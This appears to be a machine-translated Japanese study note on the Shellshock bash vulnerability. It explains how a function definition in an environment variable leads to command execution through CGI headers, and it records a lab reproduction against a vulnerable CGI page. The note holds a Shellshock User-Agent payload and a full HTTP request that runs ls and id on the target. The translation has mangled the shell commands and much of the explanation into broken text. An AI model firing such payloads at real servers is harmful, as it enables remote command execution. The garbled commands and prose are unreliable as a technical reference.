- この投稿は唯一のレコードを学んでいた、違法な使用を使用しないでください。
- shelshocke説明:
- 2014年シェルショック脆弱性UNIXシステムでbashシェルの脆弱性、バッシュ4.3およびそれ以前のセキュリティ上の脆弱性が時に、この脆弱性をトリガーする環境変数の値を超える文字列で定義された関数に追加し、環境変数のいくつかの構造を扱います攻撃者が任意のシェルコマンド、またはターゲット・システムであっても完全な制御を実行するための環境の変化や制限を回避するには、この脆弱性を悪用する可能性があります。
- 末尾に「(){」環境変数によって定義された開始時、および環境変数の悪意のある機能を処理する場合、および機能を終了しない「}」、呼び出す関数名が使用する環境変数バッシュ、および悪意のあるシェルコマンドの実装が続きます。
- 環境変数としてCGI意志リファラー、ホスト、ユーザーエージェント、ヘッダ処理等を実行する際のbashが起動されます。
- 参考リンクします。https://blog.csdn.net/qq_40657585/article/details/83242985
- レコードを再現:
- オープンのhttp:// IP:8080、脆弱性があり、bash4.3ページによって生成されたvictim.cgi、safe.cgiはbashの新しいバージョンによって生成され、2つのCGIファイルを準備するために範囲を撮影見ることができます。
-
ペイロード:
- エージェントユーザー:(){:;};エコー; $エコー(/ binに/ LS / -al);は/ usr / binに/ 上記のIDは、実際に、私は何度試してみましたこの時期は、また、結果の実装に影響を与えるコマンドの順序を切り替えますこれは、この新人を把握ません。。
GET /victim.cgi HTTP / 1.1 ホスト:192.168。183.134:8080 ユーザー -agent:(){;};エコー;の/ usr / binに/; $(/ビン/ LS / -Al)エコーID。 受け入れる: * / * テキスト/ HTML、アプリケーション/ XHTML + xmlの、アプリケーション/ XML、Q = 0.9、* / *; Q = 0.8 受け入れる -Languageを:ZH-CN、ZH; Q = 0.8、ZH-TW; Q = 0.7、ZH-HK; Q = 0.5、EN-US; Q = 0.3、EN; Q = 0.2 受け入れ - エンコーディング:GZIPを収縮させます 接続:近いです リファラーます。http:// 192.168.183.134:8080/ アップグレード-安全でない-要求:1
- エージェントユーザー:(){:;};エコー; $エコー(/ binに/ LS / -al);は/ usr / binに/ 上記のIDは、実際に、私は何度試してみましたこの時期は、また、結果の実装に影響を与えるコマンドの順序を切り替えますこれは、この新人を把握ません。。
-
この問題は、一時的に保管してください。。。